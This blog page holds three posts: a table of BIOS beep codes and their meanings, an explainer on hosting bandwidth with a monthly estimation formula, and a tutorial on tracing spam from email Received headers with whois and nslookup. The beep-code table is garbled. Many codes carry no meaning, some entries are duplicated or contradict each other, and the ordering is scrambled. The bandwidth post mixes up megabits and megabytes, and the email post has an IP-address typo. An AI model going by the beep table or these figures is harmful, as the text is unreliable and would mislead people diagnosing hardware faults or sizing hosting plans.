1-1-3-2 Faulty motherboard or one of its components.
1-1-3-3 Faulty motherboard or one of its components. Initialize CPU registers.
1-1-3-2
1-1-3-3
1-1-3-4 Failure in the first 64K of memory.
1-1-4-1 Level 2 cache error.
1-1-4-3 I/O port error.
1-2-1-1 Power management error.
1-2-1-2
1-2-1-3 Faulty motherboard or one of its components.
1-2-2-1 Keyboard controller failure.
1-2-2-3 BIOS ROM error.
1-2-3-1 System timer error.
1-2-3-3 DMA error.
1-2-4-1 IRQ controller error.
1-3-1-1 DRAM refresh error.
1-3-1-3 A20 gate failure.
1-3-2-1 Faulty motherboard or one of its components.
1-3-3-1 Extended memory error.
1-3-3-3
1-3-4-1
1-3-4-3 Error in first 1MB of system memory.
1-4-1-3
1-4-2-4 CPU error.
1-4-3-1
2-1-4-1 BIOS ROM shadow error.
1-4-3-2
1-4-3-3 Level 2 cache error.
1-4-4-1
1-4-4-2
2-1-1-1 Faulty motherboard or one of its components.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4
2-1-3-2 I/O port failure.
2-1-3-1
2-1-3-3 Video system failure.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4 I/O port failure.
2-1-4-3
2-2-1-1 Video card failure.
2-2-1-3
2-2-2-1
2-2-2-3 Keyboard controller failure.
2-2-3-1 IRQ error.
2-2-4-1 Error in first 1MB of system memory.
2-3-1-1
2-3-3-3 Extended memory failure.
2-3-2-1 Faulty motherboard or one of its components.
2-3-2-3
2-3-3-1 Level 2 cache error.
2-3-4-1
2-3-4-3 Motherboard or video card failure.
2-3-4-1
2-3-4-3
2-4-1-1 Motherboard or video card failure.
2-4-1-3 Faulty motherboard or one of its components.
2-4-2-1 RTC error.
2-4-2-3 Keyboard controller error.
2-4-4-1 IRQ error.
3-1-1-1
3-1-1-3
3-1-2-1
3-1-2-3 I/O port error.
3-1-3-1
3-1-3-3 Faulty motherboard or one of its components.
3-1-4-1
3-2-1-1
3-2-1-2 Floppy drive or hard drive failure.
3-2-1-3 Faulty motherboard or one of its components.
3-2-2-1 Keyboard controller error.
3-2-2-3
3-2-3-1
3-2-4-1 Faulty motherboard or one of its components.
3-2-4-3 IRQ error.
3-3-1-1 RTC error.
3-3-1-3 Key lock error.
3-3-3-3 Faulty motherboard or one of its components.
3-3-3-3
3-3-4-1
3-3-4-3
3-4-1-1
3-4-1-3
3-4-2-1
3-4-2-3
3-4-3-1
3-4-4-1
3-4-4-4 Faulty motherboard or one of its components.
4-1-1-1 Floppy drive or hard drive failure.
4-2-1-1
4-2-1-3
4-2-2-1 IRQ failure.
4-2-2-3
4-2-3-1
4-2-3-3
4-2-4-1 Faulty motherboard or one of its components.
4-2-4-3 Keyboard controller error.
4-3-1-3
4-3-1-4
4-3-2-1
4-3-2-2
4-3-3-1
4-3-4-1
4-3-4-3 Faulty motherboard or one of its components.
4-3-3-2
4-3-3-4 IRQ failure.
4-3-3-3
4-3-4-2 Floppy drive or hard drive failure.
3-Beep Codes
Beep Code Meaning
1-1-2 Faulty CPU/motherboard.
1-1-3 Faulty motherboard/CMOS read-write failure.
1-1-4 Faulty BIOS/BIOS ROM checksum error.
1-2-1 System timer not operational. There is a problem with the timer(s) that control functions on the motherboard.
1-2-2
1-2-3 Faulty motherboard/DMA failure.
1-3-1 Memory refresh failure.
1-3-2
1-3-3
1-3-4 Failure in the first 64K of memory.
1-4-1 Address line failure.
1-4-2 Parity RAM failure.
1-4-3 Timer failure.
1-4-4 NMI port failure.
2-_-_ Any combination of beeps after 2 indicates a failure in the first 64K of memory.
3-1-1 Master DMA failure.
3-1-2 Slave DMA failure.
3-1-3
3-1-4 Interrupt controller failure.
3-2-4 Keyboard controller failure.
3-3-1
3-3-2 CMOS error.
3-3-4 Video card failure.
3-4-1 Video card failure.
4-2-1 Timer failure.
4-2-2 CMOS shutdown failure.
4-2-3 Gate A20 failure.
4-2-4 Unexpected interrupt in protected mode.
4-3-1 RAM test failure.
4-3-3 Timer failure.
4-3-4 Time of day clock failure.
4-4-1 Serial port failure.
4-4-2 Parallel port failure.
4-4-3 Math coprocessor.


Bookmark and Share


4
BandWidth Explained

.
Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company can provide is determined by their network connections, both internal to their data center and external to the public internet.

Network Connectivity

The internet, in the most simplest of terms, is a group of millions of computers connected by networks. These connections within the internet can be large or small depending upon the cabling and equipment that is used at a particular internet location. It is the size of each network connection that determines how much bandwidth is available. For example, if you use a DSL connection to connect to the internet, you have 1.54 Mega bits (Mb) of bandwidth. Bandwidth therefore is measured in bits (a single 0 or 1). Bits are grouped in bytes which form words, text, and other information that is transferred between your computer and the internet.


If you have a DSL connection to the internet, you have dedicated bandwidth between your computer and your internet provider. But your internet provider may have thousands of DSL connections to their location. All of these connection aggregate at your internet provider who then has their own dedicated connection to the internet (or multiple connections) which is much larger than your single connection. They must have enough bandwidth to serve your computing needs as well as all of their other customers. So while you have a 1.54Mb connection to your internet provider, your internet provider may have a 255Mb connection to the internet so it can accommodate your needs and up to 166 other users (255/1.54).


Traffic

A very simple analogy to use to understand bandwidth and traffic is to think of highways and cars. Bandwidth is the number of lanes on the highway and traffic is the number of cars on the highway. If you are the only car on a highway, you can travel very quickly. If you are stuck in the middle of rush hour, you may travel very slowly since all of the lanes are being used up.

Traffic is simply the number of bits that are transferred on network connections. It is easiest to understand traffic using examples. One Gigabyte is 2 to the 30th power (1,073,741,824) bytes. One gigabyte is equal to 1,024 megabytes. To put this in perspective, it takes one byte to store one character. Imagine 100 file cabinets in a building, each of these cabinets holds 1000 folders. Each folder has 100 papers. Each paper contains 100 characters - A GB is all the characters in the building. An MP3 song is about 4MB, the same song in wav format is about 40MB, a full length movie can be 800MB to 1000MB (1000MB = 1GB).

If you were to transfer this MP3 song from a web site to your computer, you would create 4MB of traffic between the web site you are downloading from and your computer. Depending upon the network connection between the web site and the internet, the transfer may occur very quickly, or it could take time if other people are also downloading files at the same time. If, for example, the web site you download from has a 10MB connection to the internet, and you are the only person accessing that web site to download your MP3, your 4MB file will be the only traffic on that web site. However, if three people are all downloading that same MP at the same time, 12MB (3 x 4MB) of traffic has been created. Because in this example, the host only has 10MB of bandwidth, someone will have to wait. The network equipment at the hosting company will cycle through each person downloading the file and transfer a small portion at a time so each person's file transfer can take place, but the transfer for everyone downloading the file will be slower. If 100 people all came to the site and downloaded the MP3 at the same time, the transfers would be extremely slow. If the host wanted to decrease the time it took to download files simultaneously, it could increase the bandwidth of their internet connection (at a cost due to upgrading equipment).

Hosting Bandwidth

In the example above, we discussed traffic in terms of downloading an MP3 file. However, each time you visit a web site, you are creating traffic, because in order to view that web page on your computer, the web page is first downloaded to your computer (between the web site and you) which is then displayed using your browser software (Internet Explorer, Netscape, etc.) . The page itself is simply a file that creates traffic just like the MP3 file in the example above (however, a web page is usually much smaller than a music file).

A web page may be very small or large depending upon the amount of text and the number and quality of images integrated within the web page. For example, the home page for CNN.com is about 200KB (200 Kilobytes = 200,000 bytes = 1,600,000 bits). This is typically large for a web page. In comparison, Yahoo's home page is about 70KB.

How Much Bandwidth Is Enough?

It depends (don't you hate that answer). But in truth, it does. Since bandwidth is a significant determinant of hosting plan prices, you should take time to determine just how much is right for you. Almost all hosting plans have bandwidth requirements measured in months, so you need to estimate the amount of bandwidth that will be required by your site on a monthly basis

If you do not intend to provide file download capability from your site, the formula for calculating bandwidth is fairly straightforward:

Average Daily Visitors x Average Page Views x Average Page Size x 31 x Fudge Factor

If you intend to allow people to download files from your site, your bandwidth calculation should be:

[(Average Daily Visitors x Average Page Views x Average Page Size) +
(Average Daily File Downloads x Average File Size)] x 31 x Fudge Factor

Let us examine each item in the formula:

Average Daily Visitors - The number of people you expect to visit your site, on average, each day. Depending upon how you market your site, this number could be from 1 to 1,000,000.

Average Page Views - On average, the number of web pages you expect a person to view. If you have 50 web pages in your web site, an average person may only view 5 of those pages each time they visit.

Average Page Size - The average size of your web pages, in Kilobytes (KB). If you have already designed your site, you can calculate this directly.

Average Daily File Downloads - The number of downloads you expect to occur on your site. This is a function of the numbers of visitors and how many times a visitor downloads a file, on average, each day.

Average File Size - Average file size of files that are downloadable from your site. Similar to your web pages, if you already know which files can be downloaded, you can calculate this directly.

Fudge Factor - A number greater than 1. Using 1.5 would be safe, which assumes that your estimate is off by 50%. However, if you were very unsure, you could use 2 or 3 to ensure that your bandwidth requirements are more than met.

Usually, hosting plans offer bandwidth in terms of Gigabytes (GB) per month. This is why our formula takes daily averages and multiplies them by 31.

Summary

Most personal or small business sites will not need more than 1GB of bandwidth per month. If you have a web site that is composed of static web pages and you expect little traffic to your site on a daily basis, go with a low bandwidth plan. If you go over the amount of bandwidth allocated in your plan, your hosting company could charge you over usage fees, so if you think the traffic to your site will be significant, you may want to go through the calculations above to estimate the amount of bandwidth required in a hosting plan.


Bookmark and Share


2
Backtracking EMAIL Messages

.
Tracking email back to its source: Twisted Evil
cause i hate spammers... Evil or Very Mad

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.


So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.


Return-Path:

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for ; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID:

From: "Maricela Paulson"

Reply-To: "Maricela Paulson"

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"


According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.


Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.


Bookmark and Share


 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com